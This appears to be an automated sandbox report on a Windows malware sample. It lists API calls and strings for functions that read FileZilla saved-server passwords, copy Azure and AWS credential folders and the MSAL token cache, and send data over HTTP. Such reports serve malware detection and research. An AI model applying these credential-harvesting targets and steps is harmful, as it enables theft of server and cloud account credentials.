Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
Instruction ID: 77413b6f36953888d3a55742da3d0c5e1c4de17b60d52d0d4230c41e4731ac0c
Opcode Fuzzy Hash: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
Instruction Fuzzy Hash: D441F771A40A289FDB24DB58CC98B9BB7B4BB48702F5041D8E618E72D0E771AEC5CF50

Function 0074CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0074CEEF

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6498a770e5e75c72632304df1c338bfa7877370073ce39fad7123e7d8c724f4e
Instruction ID: 6660f66f397a447c3375178b609596e275306bcbb0a3d5bd02322fc8c71a33d7
Opcode Fuzzy Hash: 6498a770e5e75c72632304df1c338bfa7877370073ce39fad7123e7d8c724f4e
Instruction Fuzzy Hash: 279002A52521204A475557745D0954526906A9961676648517112C4064DB9D40055616

Function 00749750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00740250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A

Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52

strtok_s.MSVCRT ref: 0074031B
GetProcessHeap.KERNEL32(00000000,000F423F,00750DBA,00750DB7,00750DB6,00750DB3), ref: 00740362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00740385
lstrlenA.KERNEL32(00000000), ref: 00740393

Part of subcall function 007488E0: malloc.MSVCRT ref: 007488E8
Part of subcall function 007488E0: strncpy.MSVCRT ref: 00748903

StrStrA.SHLWAPI(00000000,<Port>), ref: 007403CF
lstrlenA.KERNEL32(00000000), ref: 007403DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00740419
lstrlenA.KERNEL32(00000000), ref: 00740427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00740463
lstrlenA.KERNEL32(00000000), ref: 00740475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0074051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00740532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0074054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00740562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00740571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00740580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00740593
lstrcatA.KERNEL32(?,00751678,?,?,00000000), ref: 007405A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007405B5
lstrcatA.KERNEL32(?,0075167C,?,?,00000000), ref: 007405C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 007405D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007405E6
lstrcatA.KERNEL32(?,00751688,?,?,00000000), ref: 007405F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00740604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00740617
lstrcatA.KERNEL32(?,00751698,?,?,00000000), ref: 00740626
lstrcatA.KERNEL32(?,0075169C,?,?,00000000), ref: 00740635
strtok_s.MSVCRT ref: 00740679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074068E
memset.MSVCRT ref: 007406DD

Strings

<Host>, xrefs: 0074037C
profile: null, xrefs: 00740568
<Pass encoding="base64">, xrefs: 0074045A
password: , xrefs: 007405FB
login: , xrefs: 007405CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 007402A4
Nt, xrefs: 0074072E, 007406AF, 007406B2
browser: FileZilla, xrefs: 00740559
<Port>, xrefs: 007403C6
Nt, xrefs: 007402CC, 007402F2, 007402CF, 007402F5
url: , xrefs: 00740577
<User>, xrefs: 00740410

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Nt$Nt$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-4105784323
Opcode ID: 00638fe7ee4566d5751a62dcce028db928ebe35b1c3567c9e1c5ffa51c094c2c
Instruction ID: 055dd3b45041b7a681e73a6dcde2daa761f5207096899de408733e567617831f
Opcode Fuzzy Hash: 00638fe7ee4566d5751a62dcce028db928ebe35b1c3567c9e1c5ffa51c094c2c
Instruction Fuzzy Hash: 74D13E72950208EBDB04EBF4DD9AEEE7378FF54301F408418F506A6091DF78AA49DB62

Function 00735960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007359F8
StrCmpCA.SHLWAPI(?,00FCD800), ref: 00735A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00735B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FD1E98,00000000,?,00FC4C60,00000000,?,00751A1C), ref: 00735E71
lstrlenA.KERNEL32(00000000), ref: 00735E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00735E93
HeapAlloc.KERNEL32(00000000), ref: 00735E9A
lstrlenA.KERNEL32(00000000), ref: 00735EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00735EC6
lstrlenA.KERNEL32(00000000), ref: 00735ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00735EF1
memcpy.MSVCRT(?), ref: 00735EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00735F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00735F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00735F4C
InternetCloseHandle.WININET(00000000), ref: 00735FB0
InternetCloseHandle.WININET(00000000), ref: 00735FBD
HttpOpenRequestA.WININET(00000000,00FCD8E0,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00735BF8

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

InternetCloseHandle.WININET(00000000), ref: 00735FC7

Strings

------, xrefs: 00735C0B
", xrefs: 00735E16
------, xrefs: 00735D4C
", xrefs: 00735CD5
------, xrefs: 00735A96

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: f738141c30259a37fd454c41dc23386b223892f38d5c20f83160a66cead66b9d
Instruction ID: e322a6ae907805b07957b76d50545ea384f72ca4e4812e78a85894c6d4ee70dd
Opcode Fuzzy Hash: f738141c30259a37fd454c41dc23386b223892f38d5c20f83160a66cead66b9d
Instruction Fuzzy Hash: F312E072960118FAEB15EBA0DC99FEEB37CFF54700F5041A9B10A62091DF782A49CF65

Function 00744D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00744D87

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000), ref: 00744DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00744DCD

Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943

memset.MSVCRT ref: 00744E13
lstrcatA.KERNEL32(?,00000000), ref: 00744E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00744E59

Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92

memset.MSVCRT ref: 00744E9F
lstrcatA.KERNEL32(?,00000000), ref: 00744EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00744EE5

Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00FCD870,?,000003E8), ref: 00744A4A
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FF8), ref: 00744A5C
Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A70
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FFC), ref: 00744A82
Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A96
Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31

memset.MSVCRT ref: 00744F2B

Strings

Azure\.aws, xrefs: 00744E5F
Azure\.azure, xrefs: 00744DD3
\.aws\, xrefs: 00744E4D
\.IdentityService\, xrefs: 00744ED9
\.azure\, xrefs: 00744DC1
*.*, xrefs: 00744DD8
zat, xrefs: 00744DF1, 00744E7D, 00744F09, 00744F34, 00744DF4, 00744E80, 00744F0C
Azure\.IdentityService, xrefs: 00744EEB
*.*, xrefs: 00744E64
msal.cache, xrefs: 00744EF0

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zat
API String ID: 4017274736-1609225583
Opcode ID: 44bef066371d3e3aa1719ec096f7c8743247fea58bfe330017f00671927ff21a
Instruction ID: d85e4921e8538499d70f65a441fdc30dfcc785ffae9584b9e0a2241d46453698
Opcode Fuzzy Hash: 44bef066371d3e3aa1719ec096f7c8743247fea58bfe330017f00671927ff21a
Instruction Fuzzy Hash: 5E4183B6940208A7D754F760DC4BFDD3738AB54701F404494B64AA60C1EEF85BD88B92

Function 0073CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0073D0C7
HeapAlloc.KERNEL32(00000000), ref: 0073D0CE
lstrcatA.KERNEL32(?,00000000,00FCD610,00751474,00FCD610,00751470,00000000), ref: 0073D208
lstrcatA.KERNEL32(?,00751478), ref: 0073D217
lstrcatA.KERNEL32(?,00000000), ref: 0073D22A
lstrcatA.KERNEL32(?,0075147C), ref: 0073D239
lstrcatA.KERNEL32(?,00000000), ref: 0073D24C
lstrcatA.KERNEL32(?,00751480), ref: 0073D25B
lstrcatA.KERNEL32(?,00000000), ref: 0073D26E
lstrcatA.KERNEL32(?,00751484), ref: 0073D27D
lstrcatA.KERNEL32(?,00000000), ref: 0073D290
lstrcatA.KERNEL32(?,00751488), ref: 0073D29F
lstrcatA.KERNEL32(?,00000000), ref: 0073D2B2
lstrcatA.KERNEL32(?,0075148C), ref: 0073D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0073D2D4
lstrcatA.KERNEL32(?,00751490), ref: 0073D2E3

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

lstrlenA.KERNEL32(?), ref: 0073D32A
lstrlenA.KERNEL32(?), ref: 0073D339
memset.MSVCRT ref: 0073D388

Part of subcall function 0074AA70: StrCmpCA.SHLWAPI(00000000,00751470,0073D1A2,00751470,00000000), ref: 0074AA8F

DeleteFileA.KERNEL32(00000000), ref: 0073D3B4

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: d7d46185a0d804530626447547e9ad12d020eebf9a5e7d00d69ac3f5112ab0d7
Instruction ID: bf15449e318ac4df89b4e5b532dfc7fa95be8b5a49c0d7d274c7aa8854ff7d70
Opcode Fuzzy Hash: d7d46185a0d804530626447547e9ad12d020eebf9a5e7d00d69ac3f5112ab0d7
Instruction Fuzzy Hash: 57E13D72954108EBEB05EBA0DD9AEEE737CFF54301F104158F106A6092DF39AE49DB62

Function 0073C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FD0300,00000000,?,0075144C,00000000,?,?), ref: 0073CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0073CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0073CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073CAA8
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0073CAB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0073CAD9
StrStrA.SHLWAPI(?,00FD00F0,00750B52), ref: 0073CAF7
StrStrA.SHLWAPI(00000000,00FD01B0), ref: 0073CB1E
StrStrA.SHLWAPI(?,00FD0990,00000000,?,00751458,00000000,?,00000000,00000000,?,00FCD730,00000000,?,00751454,00000000,?), ref: 0073CCA2
StrStrA.SHLWAPI(00000000,00FD05D0), ref: 0073CCB9

Part of subcall function 0073C820: memset.MSVCRT ref: 0073C853
Part of subcall function 0073C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00FCD6A0), ref: 0073C871
Part of subcall function 0073C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
Part of subcall function 0073C820: memcpy.MSVCRT(?,?,?), ref: 0073C912

StrStrA.SHLWAPI(?,00FD05D0,00000000,?,0075145C,00000000,?,00000000,00FCD6A0), ref: 0073CD5A
StrStrA.SHLWAPI(00000000,00FCD720), ref: 0073CD71

Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B46), ref: 0073C943
Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B47), ref: 0073C957
Part of subcall function 0073C820: lstrcatA.KERNEL32(?,00750B4E), ref: 0073C978

lstrlenA.KERNEL32(00000000), ref: 0073CE44
CloseHandle.KERNEL32(00000000), ref: 0073CE9C

Strings

, xrefs: 0073C9C6

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: ba94bd9bc760b1dbba8f1338997f8c2ff2e4b480d28bf86bd40b527005e0e9de
Instruction ID: ac323eac4acd31324de36cd288ff8a4d467929d37b4de8a5a3f78645e9739ad9
Opcode Fuzzy Hash: ba94bd9bc760b1dbba8f1338997f8c2ff2e4b480d28bf86bd40b527005e0e9de
